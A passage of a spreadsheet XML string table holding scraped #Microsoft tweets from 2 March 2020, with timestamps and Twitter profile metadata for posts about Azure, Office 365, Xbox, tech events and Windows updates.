'807971', 'profile_text_color': 'F2EDE6', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 14:57:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces new default background image on #Azure AD and Microsoft 365 sign-in screens https://t.co/rVXXxp9YWl</t>
  </si>
  <si>
    <t>Mon Mar 02 14:55:53 +0000 2020</t>
  </si>
  <si>
    <t>Monday motivational quote
#mondaymotivation  #ikubinfo #ikubTeam #softwareengineer #developer  #softwaredevelopmentteam #microsoft #java #oracle #javadeveloper #programming #html #csstudents https://t.co/oxYVTqt21b</t>
  </si>
  <si>
    <t>{'id': 1102599435014602754, 'id_str': '1102599435014602754', 'name': 'ikubINFO', 'screen_name': 'IkubInfo', 'location': 'Albania', 'description': 'Equipped with 25+ years of business experience of founders and key senior managers, ikubINFO is the leading Software Engineering company in Albania.', 'url': 'https://t.co/c2NQq61nnP', 'entities': {'url': {'urls': [{'url': 'https://t.co/c2NQq61nnP', 'expanded_url': 'https://ikubinfo.al/', 'display_url': 'ikubinfo.al', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 249, 'listed_count': 0, 'created_at': 'Mon Mar 04 15:59:25 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1105797164058492929/4hlnvGjc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105797164058492929/4hlnvGjc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1102599435014602754/1552306986',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</si>
  <si>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14:55:50 +0000 2020</t>
  </si>
  <si>
    <t>Next up at #globalcon1 is #Microsoft's @mkashman with his session ...
Plan for governance to transform teamwork with #Microsoft365 
https://t.co/XrcetxUjXl https://t.co/Hp5F9V0ET1</t>
  </si>
  <si>
    <t>{'id': 18355936, 'id_str': '18355936', 'name': 'Mark Jones #Collab365 #globalcon1', 'screen_name': 'MarkQJones', 'location': 'iPhone: 53.832306,-1.713404', 'description': 'Planning and organising a massive 5-day virtual summit for Office 365 called Globalcon1', 'url': 'https://t.co/s54cxp2o8h', 'entities': {'url': {'urls': [{'url': 'https://t.co/s54cxp2o8h', 'expanded_url': 'https://linktr.ee/markqjones', 'display_url': 'linktr.ee/markqjones', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3934, 'friends_count': 3663, 'listed_count': 166, 'created_at': 'Wed Dec 24 11:50:37 +0000 2008', 'favourites_count': 2069, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14172,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'http://pbs.twimg.com/profile_images/616895701373464577/Tka641Vc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/616895701373464577/Tka641Vc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18355936/1562517359', 'profile_link_color': 'BE3621',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</si>
  <si>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14:54:42 +0000 2020</t>
  </si>
  <si>
    <t>I forgot how fun halo is. When I get back I'm gonna definitely start the campaigns from the beginning. 
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning... https://t.co/Lw8nqQWTnq</t>
  </si>
  <si>
    <t>Mon Mar 02 14:53:40 +0000 2020</t>
  </si>
  <si>
    <t>Which cross-platform app development framework do you prefer? 
#app #appdev #appdevelopment #google #microsoft #facebook #poll #tech</t>
  </si>
  <si>
    <t>Mon Mar 02 14:51:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release new #Edge Dev update with Surf game to Windows 10 Insiders: Update  available for all https://t.co/s9Ye7EWt1S</t>
  </si>
  <si>
    <t>Mon Mar 02 14:51:05 +0000 2020</t>
  </si>
  <si>
    <t>Event Alert!
WHAT: The Future of Knowledge with Office 365
WHO: @gabrielkarawani 
WHERE: Microsoft HQ, Paddington, London
WHEN: 25th of March, 2020
Sign up now: https://t.co/gZXXLPEGvg https://t.co/gZXXLPEGvg 
#Microsoft #Knowledge #office365</t>
  </si>
  <si>
    <t>Mon Mar 02 14:50:00 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Streaming Big Data with Spark Streaming, Scala, and Spark 3! #udemycoupon -&amp;gt; https://t.co/I9AckYGULN
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Mon Mar 02 14:49:29 +0000 2020</t>
  </si>
  <si>
    <t>@LuiseFreese @TomaszPoszytek Have to say the highlight for me (as #D365 Geek) was seeing the other areas of the #Microsoft Stack really shine in their own right. Your level of detail on the more complex part of the processes for the room made it all seem INFINITELY more achievable! https://t.co/Fz35GwGfeU</t>
  </si>
  <si>
    <t>{'id': 1042128434049294337, 'id_str': '1042128434049294337', 'name': 'CRC365', 'screen_name': '365CRC', 'location': 'Scotland, United Kingdom', 'description': 'Dynamics365 Consultant and Self-confessed PowerBI addict. Lover of efficiency and graphs!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 493, 'friends_count': 449, 'listed_count': 9, 'created_at': 'Tue Sep 18 19:09:15 +0000 2018', 'favourites_count': 2126, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 421, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234131185183416322/8zTlegOR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234131185183416322/8zTlegOR_normal.jpg',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</si>
  <si>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14:47:35 +0000 2020</t>
  </si>
  <si>
    <t>A #Civilservant son and mother of a #Sanskrit lecturer  becomes a #CEO of #Microsoft. https://t.co/x75zU6viWj</t>
  </si>
  <si>
    <t>{'id': 320665855, 'id_str': '320665855', 'name': 'Future Group of Institutions Bareilly', 'screen_name': 'FutureInstituti', 'location': 'NH24-Bareilly-Lucknow Road ', 'description': 'Excel in Academic Follow Your Passion @ Future Group of Institutions Bareilly', 'url': 'https://t.co/X86hvtiH4V', 'entities': {'url': {'urls': [{'url': 'https://t.co/X86hvtiH4V', 'expanded_url': 'http://www.futureinstitutions.org', 'display_url': 'futureinstitutions.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 344, 'friends_count': 23, 'listed_count': 1, 'created_at': 'Mon Jun 20 09:31:31 +0000 2011', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 168, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDECE9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1184379346888167424/tykS596K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184379346888167424/tykS596K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/320665855/1571465375', 'profile_link_color': '088253',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</si>
  <si>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#Coronavirus: #Microsoft warns of hit to #computer sales
https://t.co/dTrKCYO922</t>
  </si>
  <si>
    <t>{'id': 1001918760, 'id_str': '1001918760', 'name': 'Urban IT Solutions', 'screen_name': 'UrbanITSol', 'location': 'Cheshire', 'description': "Welcome to Urban IT Solution's Twitter page! Focus on your strengths... Take advantage of ours. Your business IT Support team.", 'url': 'http://t.co/IFRsZh7boR', 'entities': {'url': {'urls': [{'url': 'http://t.co/IFRsZh7boR', 'expanded_url': 'http://www.urbanitsolutions.co.uk/', 'display_url': 'urbanitsolutions.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 802, 'friends_count': 1188, 'listed_count': 96, 'created_at': 'Mon Dec 10 15:48:05 +0000 2012', 'favourites_count': 921, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7246,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'http://pbs.twimg.com/profile_images/644039799586861056/5mVzFzjd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/644039799586861056/5mVzFzjd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1001918760/1567681672', 'profile_link_color': '1818DB',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</si>
  <si>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14:46:26 +0000 2020</t>
  </si>
  <si>
    <t>"Microsoft is giving #Windows10's File Explorer a much-needed overhaul, transforming one of the operating system's key features."
Read more:
https://t.co/aPiIB8YqfJ
#Microsoft #MicrosoftPartner #FileExplorer #Update #TechNews https://t.co/ncDP7rfBAh</t>
  </si>
  <si>
    <t>{'id': 23934646, 'id_str': '23934646', 'name': 'The One Point', 'screen_name': 'theonepoint', 'location': 'United Kingdom', 'description': 'Award Winning Managed IT, Telecoms, Mobiles and ERP/CRM Service Provider - Helpful, Responsive, Trusted. #IT #Office365 #VoIP #O2 #MDM #PHP #Sage #DataBackUp', 'url': 'https://t.co/pkMG26oSUN', 'entities': {'url': {'urls': [{'url': 'https://t.co/pkMG26oSUN', 'expanded_url': 'https://theonepoint.co.uk/', 'display_url': 'theonepoint.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3091, 'friends_count': 2993, 'listed_count': 435, 'created_at': 'Thu Mar 12 11:48:30 +0000 2009', 'favourites_count': 1816, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12101, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C0DEED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194558797278261248/bKqRXpy2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194558797278261248/bKqRXpy2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23934646/1500494485', 'profile_link_color': '1B95E0',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</si>
  <si>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14:45:00 +0000 2020</t>
  </si>
  <si>
    <t>NEW: Watch our webinars on demand, whenever and wherever it suits you. 
Available now - 'Journey to Office 365: Which tools, when' and 'Accelerate your Office 365 return on investment'.  https://t.co/ae4WkOy77C
#Microsoft #Office365 #Windows10 #ondemand https://t.co/pVL9Qrwt1M</t>
  </si>
  <si>
    <t>Mon Mar 02 14:44:32 +0000 2020</t>
  </si>
  <si>
    <t>Blog: Business Intelligence That Make's A Difference!
https://t.co/Q43OP0SKnI
#microsoft #erpsoftware #erpsolution #itsolution #software #powerbi https://t.co/4yXpKwhmAv</t>
  </si>
  <si>
    <t>{'id': 40844512, 'id_str': '40844512', 'name': 'Profile Technology Services', 'screen_name': 'ProfileTSLtd', 'location': 'UK', 'description': 'Profile Technology Services Ltd: Leading Business Solutions Provider throughout the UK.', 'url': 'http://t.co/B6rlngfzMZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/B6rlngfzMZ', 'expanded_url': 'http://www.profile.co.uk', 'display_url': 'profile.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 748, 'friends_count': 4474, 'listed_count': 9, 'created_at': 'Mon May 18 09:34:46 +0000 2009', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 446,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'http://pbs.twimg.com/profile_images/1180037880816779264/QOH50l2H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180037880816779264/QOH50l2H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40844512/1570178430', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': '95DEF2', 'profile_sidebar_fill_color': 'ECF3F2', 'profile_text_color': '4C4D52', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 14:43:45 +0000 2020</t>
  </si>
  <si>
    <t>2/ If it ends up a reality, and it sells well (AND is deemed profitable in some manner due to service revenue) you may see #Sony and #Microsoft iterate console revisions more often. Ultimately, what is the price and how will people view it next to the XSX?</t>
  </si>
  <si>
    <t>1/ There's still a wildcard in the console landscape that has yet to be revealed. No, I'm not talking about the #PS5. The wildcard would be #Microsoft's "entry level" console that was rumored to release next to the #XboxSeriesX.</t>
  </si>
  <si>
    <t>Mon Mar 02 14:39:42 +0000 2020</t>
  </si>
  <si>
    <t>"Its fine to celebrate success but it is more important to heed the lessons of failure.
#BillGates
___________________
#Enjoy #success #StockMarket #index #Microsoft #Motivation #MondayMorning #business https://t.co/aQ9dqFC9Ci</t>
  </si>
  <si>
    <t>{'id': 1223847188536741888, 'id_str': '1223847188536741888', 'name': 'Success Secret', 'screen_name': 'enterprisetips', 'location': '', 'description': 'We Help you to grow your ideas , Knowledge and Success with over Experience and Knowledgeable Documents.\nFollow for Happy Lifestyle', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 16, 'listed_count': 0, 'created_at': 'Sun Feb 02 05:54:59 +0000 2020', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 78, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223847397564076032/ohdZ7FhF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223847397564076032/ohdZ7FhF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1223847188536741888/1582809997',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</si>
  <si>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14:37:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft 's roadmap for developing #Windows applications is opposed by some #programmers who want to see a cross-platform solution, rather than just being Windows-only.
https://t.co/mI8Lj3Lvok</t>
  </si>
  <si>
    <t>Mon Mar 02 14:36:21 +0000 2020</t>
  </si>
  <si>
    <t>#GAO on Critical Infrastructure https://t.co/5fA4eXrmrR  #microsoft  not even mentioned</t>
  </si>
  <si>
    <t>Mon Mar 02 14:36:19 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of Microsoft Windows 10 Users
#Microsoft #Windows10 #Cybersecurity #GothamTG
https://t.co/JcDfua1VHH</t>
  </si>
  <si>
    <t>{'id': 34379690, 'id_str': '34379690', 'name': 'Gotham Tech Group', 'screen_name': 'GothamTG', 'location': 'Montvale, NJ', 'description': 'Gotham Technology Group is in the business of providing guidance and direction to IT professionals.', 'url': 'http://t.co/myJGGa5NsX', 'entities': {'url': {'urls': [{'url': 'http://t.co/myJGGa5NsX', 'expanded_url': 'http://www.gothamtg.com', 'display_url': 'gothamtg.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 727, 'friends_count': 312, 'listed_count': 137, 'created_at': 'Wed Apr 22 20:03:09 +0000 2009', 'favourites_count': 353, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6570, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3F4C5F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2958658926/c9c9c2feeb4a9403d60278ed38ca05da_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2958658926/c9c9c2feeb4a9403d60278ed38ca05da_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34379690/1355323671', 'profile_link_color': '3F4C5F', 'profile_sidebar_border_color': '3F4C5F', 'profile_sidebar_fill_color': 'EBF5D0', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 14:35:06 +0000 2020</t>
  </si>
  <si>
    <t>1 day left to register for App in a Day, hosted by Visionet and Microsoft on Tuesday, March 3, 2020 at Microsoft Berlin! 
Register at: https://t.co/XlJarxqkwB
#Visionet #Microsoft #powerapps #powerplatform https://t.co/kIy9V7Q7uQ</t>
  </si>
  <si>
    <t>{'id': 65181762, 'id_str': '65181762', 'name': 'Visionet Systems', 'screen_name': 'Visionet', 'location': 'Cranbury, N.J.', 'description': 'Full-service technology consulting and digital business process management firm serving top US mortgage, fashion, retail, and CPG companies for over 20 years.', 'url': 'https://t.co/1YZ80CBeX9', 'entities': {'url': {'urls': [{'url': 'https://t.co/1YZ80CBeX9', 'expanded_url': 'https://www.visionet.com', 'display_url': 'visionet.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 422, 'friends_count': 449, 'listed_count': 15, 'created_at': 'Wed Aug 12 22:21:55 +0000 2009', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 629,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'http://pbs.twimg.com/profile_images/1110507552419299331/Weuc5quF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110507552419299331/Weuc5quF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/65181762/1553598780',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</si>
  <si>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Mon Mar 02 14:32:23 +0000 2020</t>
  </si>
  <si>
    <t>Build5Nines Weekly: March 2, 2020 #Microsoft #Azure  https://t.co/I2Cpzb6RO9</t>
  </si>
  <si>
    <t>Mon Mar 02 14:31:23 +0000 2020</t>
  </si>
  <si>
    <t>LA Net Ltd is a specialist cloud managed service provider. We are now on Facebook. Please use the following link https://t.co/qLyUqJq7C7 to like our page. @LANetITUK 
#Microsoft #MicrosoftAzure #Azure #MicrosoftTeams #CloudComputing #microsoftgoldpartners #Facebook</t>
  </si>
  <si>
    <t>{'id': 226695010, 'id_str': '226695010', 'name': 'Dina Chauhan', 'screen_name': 'dina_chauhan', 'location': 'London, Lincolnshire &amp; Cambrid', 'description': 'I am dedicated to helping individuals overcome negative thoughts &amp; self sabotaging behaviour to take back control. \nNLP, TimeLineTherapy, Counsellor &amp; Hypnotist', 'url': 'https://t.co/pRCjuRxfvm', 'entities': {'url': {'urls': [{'url': 'https://t.co/pRCjuRxfvm', 'expanded_url': 'http://www.dinachauhan.com', 'display_url': 'dinachauhan.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 579, 'listed_count': 12, 'created_at': 'Tue Dec 14 20:52:11 +0000 2010', 'favourites_count': 129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 813,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'http://pbs.twimg.com/profile_images/3657855321/3c38f915e71a20c2fb67d4dde4e24a92_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3657855321/3c38f915e71a20c2fb67d4dde4e24a92_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/226695010/1429643218',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</si>
  <si>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14:30:51 +0000 2020</t>
  </si>
  <si>
    <t>' @TheDaveKurth shares some great resoueces to keep up to date with #Azure and #Microsoft  https://t.co/MtT9nnQ9oJ</t>
  </si>
  <si>
    <t>{'id': 24032059, 'id_str': '24032059', 'name': 'Thomas Maurer', 'screen_name': 'ThomasMaurer', 'location': 'Switzerland', 'description': 'Cloud Advocate at @Microsoft @Azure / Former Microsoft MVP / Part of the #AzOps team focusing on #Azure #HybridCloud\n#AzureStack #PowerShell', 'url': 'https://t.co/SkZFXkYIVp', 'entities': {'url': {'urls': [{'url': 'https://t.co/SkZFXkYIVp', 'expanded_url': 'https://www.thomasmaurer.ch/', 'display_url': 'thomasmaurer.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16389, 'friends_count': 9959, 'listed_count': 587, 'created_at': 'Thu Mar 12 20:42:49 +0000 2009', 'favourites_count': 37415, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33757, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C6E5F2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1116694731399073792/cnpARQZc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116694731399073792/cnpARQZc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24032059/1577707366', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'E1F3EE', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 14:30:17 +0000 2020</t>
  </si>
  <si>
    <t>Theres only one more day until our DevOps Webcast so dont miss your opportunity to gain crucial insights into Azure DevOps and Azure Automation, help your business succeed!
https://t.co/plFN3UhCyN 
#devops #azure #microsoft #technology https://t.co/ySvAUj1ggB</t>
  </si>
  <si>
    <t>Mon Mar 02 14:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Check out the 1st episode of the podcast Year of the Nurse &amp;amp; Midwife https://t.co/D8YjQFHjlE #microsoft #healthcare  #MSFTAdvocate https://t.co/M4XWBPHkC6</t>
  </si>
  <si>
    <t>Mon Mar 02 14:30:01 +0000 2020</t>
  </si>
  <si>
    <t>How to defend against cyber threats with #Microsoft #Office365 #Business https://t.co/QHmoIMb3o1</t>
  </si>
  <si>
    <t>Mon Mar 02 14:29:52 +0000 2020</t>
  </si>
  <si>
    <t>As if getting the #microsoft #HoloLens2 isn't exciting enough, we have also got our paws on some Towers honey made by our resident #bees #MondayVibes #towersdidsbury #shoplocal https://t.co/47E6kvxdLb</t>
  </si>
  <si>
    <t>{'id': 826503099036626948, 'id_str': '826503099036626948', 'name': 'GemDT', 'screen_name': 'GemDTLtd', 'location': 'Manchester, England', 'description': 'GemDT assisting Aerospace, Defence &amp; Engineering companies enable the true Digital Twin. Legacy data conversion, Industrial Grade inspection all on the Cloud', 'url': 'https://t.co/daqomJPZ9U', 'entities': {'url': {'urls': [{'url': 'https://t.co/daqomJPZ9U', 'expanded_url': 'http://www.gemdt.co.uk', 'display_url': 'gemdt.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 214, 'friends_count': 740, 'listed_count': 8, 'created_at': 'Tue Jan 31 18:51:09 +0000 2017', 'favourites_count': 2598, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6972, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194206079279882240/BGeo8_Kb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194206079279882240/BGeo8_Kb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/826503099036626948/1485889427',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</si>
  <si>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14:28:04 +0000 2020</t>
  </si>
  <si>
    <t>LA Net Ltd is a specialist Microsoft Azure cloud managed service provider. We are now on Facebook. Please use the following link https://t.co/qLyUqJq7C7 to like our page.
#Microsoft #MicrosoftAzure #Azure #MicrosoftTeams #CloudComputing #microsoftgoldpartners #Facebook</t>
  </si>
  <si>
    <t>Mon Mar 02 14:26:41 +0000 2020</t>
  </si>
  <si>
    <t>@XboxAmbassadorN @Xbox @XboxSupport @satyanadella Requested multiple call-backs via #microsoft support site as you said and keep getting same message (attached). Pre-order launches tomorrow. Is anyone interested in customer service?  #fail #preorder #Xbox #xboxsupport #xboxlive #badcustomerservice https://t.co/AvsGIrYVl2</t>
  </si>
  <si>
    <t>Mon Mar 02 14:16:22 +0000 2020</t>
  </si>
  <si>
    <t>Do.not.cross.the.line 
#Microsoft  $SMFT 
Stochastique (mensuel) --&amp;gt; https://t.co/bDKjcDrb50</t>
  </si>
  <si>
    <t>{'id': 485797194, 'id_str': '485797194', 'name': 'Alexandre Baradez', 'screen_name': 'ABaradez', 'location': 'Paris', 'description': 'Chief Market Analyst  \r\nIG France', 'url': 'https://t.co/EgExdhoc4A', 'entities': {'url': {'urls': [{'url': 'https://t.co/EgExdhoc4A', 'expanded_url': 'http://www.ig.com/fr?CHID=9&amp;QPID=33985&amp;SM=TW&amp;REF=ANALYST', 'display_url': 'ig.com/fr?CHID=9&amp;QPIDâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11713, 'friends_count': 361, 'listed_count': 343, 'created_at': 'Tue Feb 07 15:53:54 +0000 2012', 'favourites_count': 2141, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 55797,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'http://pbs.twimg.com/profile_images/423838873026715648/jcQS7fZA_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/423838873026715648/jcQS7fZA_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/485797194/1570788277',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</si>
  <si>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Mon Mar 02 14:15:57 +0000 2020</t>
  </si>
  <si>
    <t>#MircoSoftUpdateFail @Microsoft @Windows #Microsoft has yet again released updates that have serious adverse effects on users. This one may be as much of as embarrassment as the '98 release. Maybe if they stop forcing these updates on #Windows10 users maybe we wont be crashing</t>
  </si>
  <si>
    <t>{'id': 2828725866, 'id_str': '2828725866', 'name': '#KnysnaRebuild', 'screen_name': 'ViroCMN', 'location': 'Cape Town ', 'description': 'Viro Diaries, Youth Leader, Teacher, Gamer, Business owner, Community Protector, Community Leader, Charity Leader, Charity Organizer , Feeder, Activist,Fireman', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1247, 'friends_count': 1024, 'listed_count': 28, 'created_at': 'Tue Sep 23 21:26:16 +0000 2014', 'favourites_count': 23651, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28809,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'http://pbs.twimg.com/profile_images/643756081261338624/gT-W4tkr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/643756081261338624/gT-W4tkr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2828725866/1418035020',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</si>
  <si>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14:14:14 +0000 2020</t>
  </si>
  <si>
    <t>Thank you @SPSChicagoBurbs attendees, organizers and speakers for hosting another great #SharePoint and #Microsoft 365 event.  https://t.co/UiaNu4hCRK - mattengibous</t>
  </si>
  <si>
    <t>{'id': 45464051, 'id_str': '45464051', 'name': 'Concurrency', 'screen_name': 'ConcurrencyInc', 'location': 'Milwaukee, Wisconsin', 'description': 'Get the latest from Concurrency, Inc., a Microsoft-focused IT consulting company serving the US.', 'url': 'http://t.co/sWzlwfKTrt', 'entities': {'url': {'urls': [{'url': 'http://t.co/sWzlwfKTrt', 'expanded_url': 'http://www.concurrency.com', 'display_url': 'concurrency.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5790, 'friends_count': 2768, 'listed_count': 203, 'created_at': 'Mon Jun 08 00:52:41 +0000 2009', 'favourites_count': 266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6206,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'http://pbs.twimg.com/profile_images/976170422755516416/2UgYT86c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/976170422755516416/2UgYT86c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/45464051/1521572098', 'profile_link_color': '0397D6', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 14:14:01 +0000 2020</t>
  </si>
  <si>
    <t>Thank you @SPSChicagoBurbs attendees, organizers and speakers for hosting another great #SharePoint and #Microsoft 365 event. @ConcurrencyInc https://t.co/Bv1q4lXRBm</t>
  </si>
  <si>
